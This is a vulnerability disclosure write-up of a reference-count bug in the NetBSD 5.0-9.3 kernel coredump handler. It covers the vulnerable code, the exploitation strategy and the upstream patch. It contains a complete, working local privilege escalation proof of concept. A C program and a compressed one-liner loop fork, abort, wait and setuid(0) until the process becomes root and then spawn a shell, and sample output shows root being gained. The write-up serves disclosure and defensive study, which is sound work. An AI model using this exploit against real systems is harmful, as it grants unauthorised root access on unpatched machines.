Crash Override: NetBSD 5.0-9.3 Coredump Kernel Refcount LPE
chris
Introduction
NetBSD 5.0 (released in 2009) changed the in-kernel coredump handler in a way that accidentally introduced a reference count bug on the crashing process’ credential.
Triggering the vulnerability leads to a use-after-free that can be trivially (though slowly) exploited to achieve local privilege escalation, gaining root from an unprivileged starting point.

This article will discuss the simplicity of both the vulnerability and the exploitation strategy, leading on to a functional proof of concept exploit.
The vulnerability affects all versions of NetBSD from 5.0 through to 9.3 and can be exploited in an architecture-independent manner. A fix was pushed to the branches for NetBSD 8.x and NetBSD 9.x, followed by the release of an advisory soon afterwards.
Special thanks to Christos Zoulas of NetBSD for keeping me personally updated, and for authoring and pushing through the relevant advisory.
Vulnerability Overview
Coredumps are created for processes when they appear to have terminated unexpectedly. The idea is to capture as much debug information as possible to assist somebody in diagnosing what actually happened and why. These coredumps are usually written to disk in the current working directory of the process with a .core file extension.
We can see the jumping off point for invoking any registered coredump handler in the guts of the signal handling code:
/*
 * Force the current process to exit with the specified signal, dumping core
 * if appropriate. We bypass the normal tests for masked and caught
 * signals, allowing unrecoverable failures to terminate the process without
 * changing signal state. Mark the accounting record with the signal
 * termination. If dumping core, save the signal number for the debugger.
 * Calls exit and does not return.
 */
void
sigexit(struct lwp *l, int signo)
{
    int exitsig, error, docore;
    ...
[1] if ((docore = (sigprop[signo] & SA_CORE)) != 0) {
    ...
    if (docore) {
        mutex_exit(p->p_lock);
[2]     MODULE_HOOK_CALL(coredump_hook, (l, NULL), enosys(), error);
If a signal is configured to force an exit of the process then we end up in this sigexit function. Further, if the specific signal has been configured to trigger a coredump [1] then we reach a call to whatever coredump_hook has been configured [2].
There is only one coredump handler registered in the NetBSD codebase:
MODULE_HOOK_SET(coredump_hook, coredump);
The coredump function describes itself well and is pretty simple:
/*
 * Dump core, into a file named "progname.core" or "core" (depending on the
 * value of shortcorename), unless the process was setuid/setgid.
 */
static int
coredump(struct lwp *l, const char *pattern)
{
    struct vnode *vp;
    struct proc *p;
    struct vmspace *vm;
    kauth_cred_t cred;
    struct pathbuf *pb;
    struct vattr vattr;
    struct coredump_iostate io;
    struct plimit *lim;
    int error, error1;
    char *name, *lastslash;
    ...
    /*
     * It may well not be curproc, so grab a reference to its current
     * credentials.
     */
[3] kauth_cred_hold(p->p_cred);
    cred = p->p_cred;
    ...
[4] pb = pathbuf_create(name);
    if (pb == NULL) {
        error = ENOMEM;
        goto done;
    }
[5] error = vn_open(NULL, pb, 0, O_CREAT | O_NOFOLLOW | FWRITE,
        S_IRUSR | S_IWUSR, &vp, NULL, NULL);
    if (error != 0) {
        pathbuf_destroy(pb);
[6]     goto done;
    }
    ...
[7] done:
    if (name != NULL)
        PNBUF_PUT(name);
    return error;
}
One of the first things the function does is hold onto the crashing process’ credential [3]. This takes a reference on it so that it can’t go away while it’s being dealt with.
Omitted from the snippet here is the logic for building up the corefile name. Once it has been built, the function goes on to create a pathbuf from it [4] and then tries to open that path for writing through vn_open at [5].
If that vn_open fails for any reason – for instance, if the crashing process doesn’t have permission to create files in the current directory – then the code jumps to done [6].
At done, we expect to see the cleanup code for the failed coredump attempt [7]. The name pathname buffer is indeed put, but nothing else happens here.
Importantly, the reference taken on the credential at [3] is never released. In fact, none of the error or success paths seem to do this.
This is the vulnerability: it’s a classic refcount bug that we can trigger by crashing one of our processes.
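The leak can be modelled in a few lines of userland C. This is only a sketch: model_cred, model_hold, model_coredump and model_leak are hypothetical stand-ins invented for illustration, not kernel code. It shows the count growing by one for every simulated coredump, whether or not the open fails.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical userland stand-in for a kernel credential. */
struct model_cred {
    unsigned int refcnt;
};

/* Plays the role of kauth_cred_hold(): take one reference. */
static void
model_hold(struct model_cred *c)
{
    assert(c->refcnt > 0);
    c->refcnt++;
}

/*
 * Same shape as the vulnerable coredump(): a reference is taken up
 * front and no path out of the function gives it back.
 */
static int
model_coredump(struct model_cred *c, bool open_fails)
{
    model_hold(c);
    if (open_fails)
        return -1;  /* "goto done" with no release */
    return 0;       /* the success path does not release either */
}

/* Run n simulated coredumps and report the resulting count. */
static unsigned int
model_leak(unsigned int start, unsigned int n)
{
    struct model_cred c = { .refcnt = start };

    for (unsigned int i = 0; i < n; i++)
        (void)model_coredump(&c, true);
    return c.refcnt;
}
```

Starting from a count of 1, five simulated coredumps leave the model at 6: one leaked reference per crash.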
Exploitability Analysis
To understand whether this refcount bug is exploitable, we need to ensure that a wrap of the refcount won’t be detected or prevented. We can find that out by looking at the kauth_cred_hold function:
/* Increment reference count to cred. */
void
kauth_cred_hold(kauth_cred_t cred)
{
    KASSERT(cred != NULL);
    KASSERT(cred != NOCRED);
    KASSERT(cred != FSCRED);
    KASSERT(cred->cr_refcnt > 0);
[1] atomic_inc_uint(&cred->cr_refcnt);
}
We see here that atomic_inc_uint is used to increment the reference count [1]. That will not detect the wrap. The KASSERTs in this function are also essentially no-ops for anything other than debug kernels, so we can ignore them.
Also worth noting is that cr_refcnt is a u_int. That’s 32 bits wide on the platforms we probably care about, which means that wrapping the count is feasible.
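The wrap itself is ordinary unsigned arithmetic. The sketch below uses a hypothetical helper, model_hold_n, to add n leaked references to a plain unsigned int and show the count passing through zero. The assert mirrors the precondition that the KASSERT expresses and is not part of any kernel API.

```c
#include <assert.h>
#include <limits.h>

/*
 * Add n leaked references to an unchecked counter. Unsigned overflow is
 * well defined in C: the result is reduced modulo UINT_MAX + 1.
 */
static unsigned int
model_hold_n(unsigned int refcnt, unsigned int n)
{
    assert(refcnt > 0);  /* same precondition the KASSERT checks */
    return refcnt + n;   /* wraps silently, like an unchecked increment */
}
```

With a 32-bit unsigned int, model_hold_n(1, UINT_MAX) comes back as 0 and model_hold_n(2, UINT_MAX) as 1, so roughly 2^32 leaked references are enough to bring the count back around.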
Assuming we can wrap the reference count and trigger a path that decrements it afterwards, what happens? We can answer that by looking at the responsible function, kauth_cred_free:
/* Decrease reference count to cred. If reached zero, free it. */
void
kauth_cred_free(kauth_cred_t cred)
{
    KASSERT(cred != NULL);
    KASSERT(cred != NOCRED);
    KASSERT(cred != FSCRED);
    KASSERT(cred->cr_refcnt > 0);
    ASSERT_SLEEPABLE();
#ifndef __HAVE_ATOMIC_AS_MEMBAR
    membar_release();
#endif
[2] if (atomic_dec_uint_nv(&cred->cr_refcnt) > 0)
        return;
#ifndef __HAVE_ATOMIC_AS_MEMBAR
    membar_acquire();
#endif
    kauth_cred_hook(cred, KAUTH_CRED_FREE, NULL, NULL);
    specificdata_fini(kauth_domain, &cred->cr_sd);
[3] pool_cache_put(kauth_cred_cache, cred);
}
This function decrements the refcount and, if it’s still positive [2], just returns out.
If the refcount did drop to zero then a little tidying up is done before putting the credential back into the kauth_cred_cache [3].
This is an interesting point to note: kauth_cred_ts are allocated from their own dedicated pool and not the general purpose heap. This fact informs our exploit development process.
I admit to knowing next to nothing about the NetBSD kernel heaps. Even so, without knowing any of the internals, we can make an educated guess that it probably works in a last-in, first-out (LIFO) fashion as most kernel heap implementations tend to.
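To make the LIFO guess concrete, here is a toy fixed-size pool with a free list that hands back the most recently freed object first. It is a userland illustration only. The model_pool_* names and the four-object size are invented for this sketch and say nothing about how the real pool_cache is implemented.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_POOL_OBJS 4  /* arbitrary size for the illustration */

struct model_obj {
    struct model_obj *next_free;  /* meaningful only while free */
    unsigned int payload;
};

struct model_pool {
    struct model_obj objs[MODEL_POOL_OBJS];
    struct model_obj *free_head;
};

static void
model_pool_init(struct model_pool *p)
{
    p->free_head = NULL;
    for (size_t i = 0; i < MODEL_POOL_OBJS; i++) {
        p->objs[i].next_free = p->free_head;
        p->free_head = &p->objs[i];
    }
}

/* Pop the head of the free list (NULL if the pool is exhausted). */
static struct model_obj *
model_pool_get(struct model_pool *p)
{
    struct model_obj *o = p->free_head;

    if (o != NULL)
        p->free_head = o->next_free;
    return o;
}

/* Push the object back on the head of the free list. */
static void
model_pool_put(struct model_pool *p, struct model_obj *o)
{
    assert(o != NULL);
    o->next_free = p->free_head;
    p->free_head = o;
}

/* Returns 1 if the object just freed is the next one handed out. */
static int
model_lifo_reuses_last_freed(void)
{
    struct model_pool p;
    struct model_obj *a, *b, *c;

    model_pool_init(&p);
    a = model_pool_get(&p);
    b = model_pool_get(&p);
    model_pool_put(&p, a);
    c = model_pool_get(&p);
    (void)b;  /* still allocated; only here to show a is not the sole object */
    return c == a;
}
```

In this model the address freed last is always the next one returned, which is the property the rest of the exploit relies on.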
Exploitation Strategy
We need to think about how we might exploit this:
1. Trigger the vulnerability to wrap the kauth_cred_t refcount to 1.
2. Cause kauth_cred_free to get called somehow.
3. Have a privileged kauth_cred_t allocated in its place.
If we assume the kernel heap operates on a LIFO basis, this should be enough to elevate our privileges. So what could be a convenient way of calling kauth_cred_free on our credential?
One very simple observation is that kauth_cred_free is called when a process is reaped. This leads to a nice simple strategy of looping over the following steps:
1. Fork.
2. In the child, trigger a coredump (e.g. through abort(3)).
3. In the parent, reap the child through wait(2).
Eventually that reap at step 3 will drop the kauth_cred_t reference from its wrapped value of 1 down to 0 and cause it to be freed, leaving the parent process with a dangling credential on its process (p->p_cred).
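A single iteration of the fork, crash and reap steps above can be sketched with standard POSIX calls. crash_and_reap_once is a hypothetical helper name. It does one round and reports which signal killed the child. Whether a core file is actually written depends on the system's coredump settings.

```c
#include <assert.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Fork a child that dies from SIGABRT, then reap it. Returns the signal
 * that terminated the child, or -1 on error.
 */
static int
crash_and_reap_once(void)
{
    int status;
    pid_t pid = fork();

    if (pid == -1)
        return -1;
    if (pid == 0) {
        abort();     /* default action for SIGABRT includes a coredump */
        _exit(127);  /* not reached */
    }
    assert(pid > 0);  /* parent from here on */
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    if (!WIFSIGNALED(status))
        return -1;
    return WTERMSIG(status);
}
```

On a vulnerable kernel each such round would leak one credential reference. On its own the helper is harmless and simply returns SIGABRT.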
With a dangling kauth_cred_t pointer, our next job is to allocate a privileged credential in its place. How could we do that?
Amusingly, it turns out that we can just call setuid(0); and magically become root. :)
Let’s start out by looking at sys_setuid:
/* ARGSUSED */
int
sys_setuid(struct lwp *l, const struct sys_setuid_args *uap, register_t *retval)
{
    /* {
        syscallarg(uid_t) uid;
    } */
    uid_t uid = SCARG(uap, uid);

[1] return do_setresuid(l, uid, uid, uid,
        ID_R_EQ_R | ID_E_EQ_R | ID_S_EQ_R);
}
Most of the core logic of the various setuid functions is actually implemented by the do_setresuid function [1].
/*
 * Set real, effective and saved uids to the requested values.
 * non-root callers can only ever change uids to values that match
 * one of the processes current uid values.
 * This is further restricted by the flags argument.
 */
int
do_setresuid(struct lwp *l, uid_t r, uid_t e, uid_t sv, u_int flags)
{
    struct proc *p = l->l_proc;
    kauth_cred_t cred, ncred;

[2] ncred = kauth_cred_alloc();

    /* Get a write lock on the process credential. */
    proc_crmod_enter();
[3] cred = p->p_cred;

    /*
     * Check that the new value is one of the allowed existing values,
     * or that we have root privilege.
     */
    if ((r != -1
        && !((flags & ID_R_EQ_R) && r == kauth_cred_getuid(cred))
        && !((flags & ID_R_EQ_E) && r == kauth_cred_geteuid(cred))
        && !((flags & ID_R_EQ_S) && r == kauth_cred_getsvuid(cred))) ||
        (e != -1
        && !((flags & ID_E_EQ_R) && e == kauth_cred_getuid(cred))
        && !((flags & ID_E_EQ_E) && e == kauth_cred_geteuid(cred))
        && !((flags & ID_E_EQ_S) && e == kauth_cred_getsvuid(cred))) ||
        (sv != -1
        && !((flags & ID_S_EQ_R) && sv == kauth_cred_getuid(cred))
        && !((flags & ID_S_EQ_E) && sv == kauth_cred_geteuid(cred))
        && !((flags & ID_S_EQ_S) && sv == kauth_cred_getsvuid(cred)))) {
        int error;

        error = kauth_authorize_process(cred, KAUTH_PROCESS_SETID,
            p, NULL, NULL, NULL);
        if (error != 0) {
            proc_crmod_leave(cred, ncred, false);
            return error;
        }
    }

    /* If nothing has changed, short circuit the request */
[4] if ((r == -1 || r == kauth_cred_getuid(cred))
        && (e == -1 || e == kauth_cred_geteuid(cred))
        && (sv == -1 || sv == kauth_cred_getsvuid(cred))) {
[5]     proc_crmod_leave(cred, ncred, false);
        return 0;
    }
    ...
The very first thing this function does is allocate a new credential, ncred [2]. We also pull out the pointer to the current credential, cred [3].
Assuming the credential pool really does behave in a LIFO fashion, and given that p->p_cred is dangling, we actually end up in the situation where ncred == cred. So p->p_cred is now pointing to whatever kauth_cred_alloc returned:
/* Allocate new, empty kauth credentials. */
kauth_cred_t
kauth_cred_alloc(void)
{
    kauth_cred_t cred;

    cred = pool_cache_get(kauth_cred_cache, PR_WAITOK);
    cred->cr_refcnt = 1;
    cred->cr_uid = 0;
    cred->cr_euid = 0;
    cred->cr_svuid = 0;
    cred->cr_gid = 0;
    cred->cr_egid = 0;
    cred->cr_svgid = 0;
    cred->cr_ngroups = 0;
    specificdata_init(kauth_domain, &cred->cr_sd);
    kauth_cred_hook(cred, KAUTH_CRED_INIT, NULL, NULL);
    return (cred);
}
Aha, that just happens to be a nice pure root cred. :)
With both ncred and cred pointing to a pure root cred, we skip over the first big if-statement in do_setresuid and land at [4]. The conditions at [4] now check out and we call proc_crmod_leave before returning success to userland.
We are now magically root.
An important side note here is that our p->p_cred is actually still dangling: that’s because the call to proc_crmod_leave drops a reference on one of the cred arguments. Since the cred has a refcount of 1 at this point, a free will occur.
But that’s okay as long as we’re careful: figuring out how to secure our access and leave the system in a stable state from this point is academic. For our proof of concept, just doing this will be fine.
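The aliasing between ncred and cred can be reproduced in a small userland model. Everything here is a hypothetical stand-in: a two-slot LIFO free stack plays the credential pool, model_cred_alloc zeroes the uid the way kauth_cred_alloc does, and model_setuid keeps only the "nothing has changed" comparison from do_setresuid. It is a sketch of the logic, not the kernel's code.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for a credential; only the fields we need. */
struct model_cred {
    unsigned int refcnt;
    unsigned int uid;
};

/* Two-slot pool with a LIFO free stack: last freed is first reused. */
static struct model_cred slots[2];
static struct model_cred *free_stack[2] = { &slots[0], &slots[1] };
static int free_top = 2;

static struct model_cred *
model_cred_alloc(void)
{
    struct model_cred *c;

    assert(free_top > 0);
    c = free_stack[--free_top];
    c->refcnt = 1;
    c->uid = 0;  /* fresh creds start with uid 0, as in kauth_cred_alloc */
    return c;
}

static void
model_cred_free(struct model_cred *c)
{
    if (--c->refcnt == 0)
        free_stack[free_top++] = c;  /* contents are left as they were */
}

/* Only the "nothing has changed" comparison, for a single uid. */
static int
model_setuid(struct model_cred *cred, unsigned int uid)
{
    struct model_cred *ncred = model_cred_alloc();  /* may alias cred */
    int ret = (uid == cred->uid) ? 0 : -1;  /* real code: privilege check */

    model_cred_free(ncred);  /* stands in for proc_crmod_leave */
    return ret;
}

/* Try setuid(0) as uid 1000, with or without a dangling p_cred. */
static int
model_attempt(int dangling)
{
    struct model_cred *p_cred = model_cred_alloc();
    int ret;

    p_cred->uid = 1000;
    if (dangling)
        model_cred_free(p_cred);  /* count hits zero: p_cred now dangles */
    ret = model_setuid(p_cred, 0);
    if (!dangling)
        model_cred_free(p_cred);  /* tidy up the healthy case */
    return ret;
}
```

With a healthy credential the comparison fails and the model returns -1. With a dangling one, the fresh allocation lands on the same slot, the uid reads back as 0 and the call reports success.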
The final process is:
1. Loop while setuid(0) fails:
   1. Fork.
   2. In the child, call abort(3) to trigger a coredump.
   3. In the parent, call wait(2) to reap the child.
2. If we’ve exited the loop, we’re now root, so drop to a shell.
Visualisation
Some ASCII art can help visualise this process. After many coredumps, we end up with our kauth_cred_t’s cr_refcnt wrapping around to zero:
┌────────────────────┐
│                    │
│                    │
│    parent proc     │─p_cred─┐
│                    │        │
│                    │        │         ┌──────────────────────────┐
└────────────────────┘        │         │                          │
           │                  │         │       kauth_cred_t       │
           │                  │         │        uid: 1000         │
           │                  ├────────▶│       cr_refcnt: 0       │
           ▼                  │         │                          │
┌────────────────────┐        │         │                          │
│                    │        │         └──────────────────────────┘
│                    │ p_cred │
│     child proc     │────────┘
│                    │
│                    │
└────────────────────┘
Now when this child triggers a coredump, we end up with yet another reference taken:
┌────────────────────┐
│                    │
│                    │
│    parent proc     │─p_cred─┐
│                    │        │
│                    │        │         ┌──────────────────────────┐
└────────────────────┘        │         │                          │
           │                  │         │       kauth_cred_t       │
           │                  │         │        uid: 1000         │
           │                  ├────────▶│       cr_refcnt: 1       │
           ▼                  │         │                          │
┌────────────────────┐        │         │                          │
│                    │        │         └──────────────────────────┘
│     child proc     │ p_cred │
│   <in coredump>    │────────┘
│                    │
│                    │
└────────────────────┘
Since coredump bumps the refcount to 1 and leaves it there, when the parent process now comes to reap the child, kauth_cred_free will see cr_refcnt drop to zero and free the cred:
                                     ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─
┌────────────────────┐                                          │
│                    │               │      <free memory>
│                    │                       kauth_cred_t       │
│    parent proc     │────p_cred────▶│        uid: 1000
│                    │                       cr_refcnt: 0       │
│                    │               │
└────────────────────┘                ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┘
Now our process’ p_cred points to something that still looks like a cred, but it’s actually been freed.
Calling setuid(0); now will allocate that same virtual address, overwrite it, find that we already appear to be root and return success (freeing the cred back again). That leaves us in this state:
                                     ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─
┌────────────────────┐                                          │
│                    │               │      <free memory>
│                    │                       kauth_cred_t       │
│    parent proc     │────p_cred────▶│        uid: 0
│                    │                       cr_refcnt: 0       │
│                    │               │
└────────────────────┘                ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┘
Our p_cred is still pointing to freed memory, but now it looks like a root cred because of how do_setresuid works. We’re effectively root, even if we are standing on thin ice at this point.
Proof of Concept Exploit
Here’s the code with utility code omitted:
/*
 * Crash Override: NetBSD 5.0-9.3 Coredump LPE PoC
 * By [email protected] / 2022-Sep-06
 */
#include <machine/limits.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>
#include "libpoc.h"

const char *poc_title = "NetBSD 5.0-9.3 Coredump Local Privilege Escalation (Crash Override)";
const char *poc_author = "[email protected]";

int
main(int argc, char *argv[])
{
    unsigned int n;
    char * const av[] = { "/bin/sh", "-i", NULL };
    char * const ev[] = { "PATH=/bin:/sbin:/usr/bin:/usr/sbin", NULL };

    banner();
    log_info("Changing directory to /");
    expect(chdir("/"));
    log_info("Beginning refcount wrap");
    for (n = 0; n < UINT_MAX; ++n) {
        if (!(n & 0x000fffff)) {
            log_progress("Progress: 0x%08x / ~0x%08x...", n, UINT_MAX);
        }
        if (!vfork()) {
            abort();
        } else {
            expect(wait(NULL));
        }
        if (!setuid(0)) {
            break;
        }
    }
    log_progress_complete();
    if (getuid() == 0) {
        log_info("Success!");
        expect(execve(av[0], av, ev));
    }
    log_fatal("Failed");
    return 0;
}
A full PoC archive is provided at the end of the article.
We can also make this a terrible one-liner for which I can only apologise:
/* cc -o d d.c && ./d */
main(){while((vfork()||*(int*)0)&&(!wait(0)||setuid(0)));execl("/bin/sh","-i",0);}
Triggering this particular refcount bug takes some time since we’re continuously creating and destroying processes as we go. This was compounded by the fact that my experiments were being done on an emulated amd64 QEMU VM; all of my machines are Apple Silicon these days. vfork helps substantially over fork, but it’s still a multi-hour marathon to complete the wrap.
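For a feel of the timescale, a back-of-the-envelope helper is enough. wrap_hours is a hypothetical function, and the iteration rate passed to it is a figure you would have to measure on your own machine; none was recorded here. It assumes one leaked reference per loop iteration and a full 2^32 wrap.

```c
#include <assert.h>

/*
 * Rough wall-clock estimate for a full 32-bit wrap, in hours.
 * iterations_per_sec is an assumed, measured-by-you figure.
 */
static double
wrap_hours(double iterations_per_sec)
{
    const double iterations = 4294967296.0;  /* 2^32 leaked references */

    assert(iterations_per_sec > 0.0);
    return iterations / iterations_per_sec / 3600.0;
}
```

At a purely illustrative 100,000 iterations per second this works out to a little under 12 hours, and halving the rate doubles the wait.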
To simplify exploit development, I decided to cheat. I modified the kernel coredump function locally to wrap after p->p_cred->cr_refcnt exceeded 200, then recompiled overnight. This gave me confidence that the bug was real without being too expensive time-wise.
Once the technique was proven, I repeated against unmodified, clean installs for both NetBSD 9.3 and NetBSD 8.0 as those represented the span of currently-maintained releases at time of writing. The exploit succeeded just fine for both.
Here’s some sample output of the PoC running:
$ uname -msr
NetBSD 9.3 amd64
$ make all && ./crash-override
cc -c -o crash-override.o crash-override.c
cc -c -o libpoc.o libpoc.c
cc -o crash-override crash-override.o libpoc.o
[+] NetBSD 5.0-9.3 Coredump Local Privilege Escalation (Crash Override)
[+] By [email protected]
[+] ---
[+] Changing directory to /
[+] Beginning refcount wrap
[+] Progress: 0xfff00000 / ~0xffffffff...
[+] Success!
# id
uid=0(root) gid=0(wheel)
# whoami
root
#
Fix
I reported the issue to the NetBSD Security Alert Team on the 6th of September, 2022. The issue was quickly fixed with the following patch:
diff --git a/sys/kern/kern_core.c b/sys/kern/kern_core.c
index c42bcfb229ea..22f47c894ae8 100644
--- a/sys/kern/kern_core.c
+++ b/sys/kern/kern_core.c
@@ -1,4 +1,4 @@
-/* $NetBSD: kern_core.c,v 1.35 2021/06/29 22:40:53 dholland Exp $ */
+/* $NetBSD: kern_core.c,v 1.36 2022/09/09 14:30:17 christos Exp $ */
/*
* Copyright (c) 1982, 1986, 1989, 1991, 1993
@@ -37,7 +37,7 @@
*/
#include <sys/cdefs.h>
-__KERNEL_RCSID(0, "$NetBSD: kern_core.c,v 1.35 2021/06/29 22:40:53 dholland Exp $");
+__KERNEL_RCSID(0, "$NetBSD: kern_core.c,v 1.36 2022/09/09 14:30:17 christos Exp $");
#ifdef _KERNEL_OPT
#include "opt_execfmt.h"
@@ -121,7 +121,7 @@ coredump(struct lwp *l, const char *pattern)
struct vnode *vp;
struct proc *p;
struct vmspace *vm;
- kauth_cred_t cred;
+ kauth_cred_t cred = NULL;
struct pathbuf *pb;
struct vattr vattr;
struct coredump_iostate io;
@@ -145,9 +145,7 @@ coredump(struct lwp *l, const char *pattern)
if (USPACE + ctob(vm->vm_dsize + vm->vm_ssize) >=
p->p_rlimit[RLIMIT_CORE].rlim_cur) {
error = EFBIG; /* better error code? */
- mutex_exit(p->p_lock);
- mutex_exit(&proc_lock);
- goto done;
+ goto release;
}
/*
@@ -164,9 +162,7 @@ coredump(struct lwp *l, const char *pattern)
if (p->p_flag & PK_SUGID) {
if (!security_setidcore_dump) {
error = EPERM;
- mutex_exit(p->p_lock);
- mutex_exit(&proc_lock);
- goto done;
+ goto release;
}
pattern = security_setidcore_path;
}
@@ -180,11 +176,8 @@ coredump(struct lwp *l, const char *pattern)
error = coredump_buildname(p, name, pattern, MAXPATHLEN);
mutex_exit(&lim->pl_lock);
- if (error) {
- mutex_exit(p->p_lock);
- mutex_exit(&proc_lock);
- goto done;
- }
+ if (error)
+ goto release;
/*
* On a simple filename, see if the filesystem allow us to write
@@ -198,6 +191,7 @@ coredump(struct lwp *l, const char *pattern)
error = EPERM;
}
+release:
mutex_exit(p->p_lock);
mutex_exit(&proc_lock);
if (error)
@@ -284,6 +278,8 @@ coredump(struct lwp *l, const char *pattern)
if (error == 0)
error = error1;
done:
+ if (cred != NULL)
+ kauth_cred_free(cred);
if (name != NULL)
PNBUF_PUT(name);
return error;
We can see that the fix correctly adds the missing kauth_cred_free call to the exit path.
The patch was made for NetBSD 8.x and 9.x; releases prior to NetBSD 8.0 are not maintained per the NetBSD maintenance policy and so won’t receive the fix.
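The shape of the fix can be checked against the same kind of userland model used for reasoning about the leak. The names below (model_cred, model_hold, model_free, model_coredump_fixed, model_refcnt_after) are hypothetical. The sketch copies only the pattern visible in the patch: cred starts out as NULL and the shared exit label drops the reference if one was taken.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical userland stand-in for a kernel credential. */
struct model_cred {
    unsigned int refcnt;
};

static void
model_hold(struct model_cred *c)
{
    assert(c->refcnt > 0);
    c->refcnt++;
}

static void
model_free(struct model_cred *c)
{
    assert(c->refcnt > 0);
    c->refcnt--;
}

/* Patched pattern: every path funnels through one balanced exit. */
static int
model_coredump_fixed(struct model_cred *pc, bool early_fail, bool open_fails)
{
    struct model_cred *cred = NULL;
    int error = 0;

    if (early_fail) {  /* a failure before any reference is taken */
        error = -1;
        goto done;
    }
    model_hold(pc);
    cred = pc;
    if (open_fails) {
        error = -1;
        goto done;
    }
done:
    if (cred != NULL)
        model_free(cred);  /* the release the original code lacked */
    return error;
}

/* Run n simulated coredumps and report the resulting count. */
static unsigned int
model_refcnt_after(unsigned int n, bool early_fail, bool open_fails)
{
    struct model_cred c = { .refcnt = 1 };

    for (unsigned int i = 0; i < n; i++)
        (void)model_coredump_fixed(&c, early_fail, open_fails);
    return c.refcnt;
}
```

However many times the model crashes, and whichever path it takes, the count stays where it started.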